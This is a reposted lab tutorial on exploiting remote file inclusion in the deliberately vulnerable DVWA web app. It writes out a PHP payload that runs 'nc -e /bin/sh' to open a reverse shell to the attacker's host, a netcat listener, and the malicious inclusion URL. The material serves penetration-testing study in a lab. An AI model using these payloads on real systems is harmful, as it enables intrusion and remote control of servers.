码迷,mamicode.com
首页 > Web开发 > 详细

Ethical Hacking - Web Penetration Testing(6)

时间:2020-02-07 22:45:28      阅读:143      评论:0      收藏:0      [点我收藏+]

标签:for   reverse   cti   local   strong   png   tac   create   cut   

REMOTE FILE INCLUSION

  • Similar to local file inclusion.
  • But allows an attacker to read ANY file from ANY server.
  • Execute PHP files from other servers on the current server.
  • Store PHP files on other servers as .txt.

Pre-Condition:

Set allow_url_include to On status.

技术图片

 

 Restart web service

技术图片

 

 

Create a local php file on /var/www/html.

<?php
passthru("nc -e /bin/sh 10.0.0.13 8080");
?>

技术图片

 

 

Execute the NC command to wait for connection.

nc -vv -l -p 8080

Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.

技术图片

 

 We connect to the target machine successfully.

技术图片

 

Ethical Hacking - Web Penetration Testing(6)

标签:for   reverse   cti   local   strong   png   tac   create   cut   

原文地址:https://www.cnblogs.com/keepmoving1113/p/12274844.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!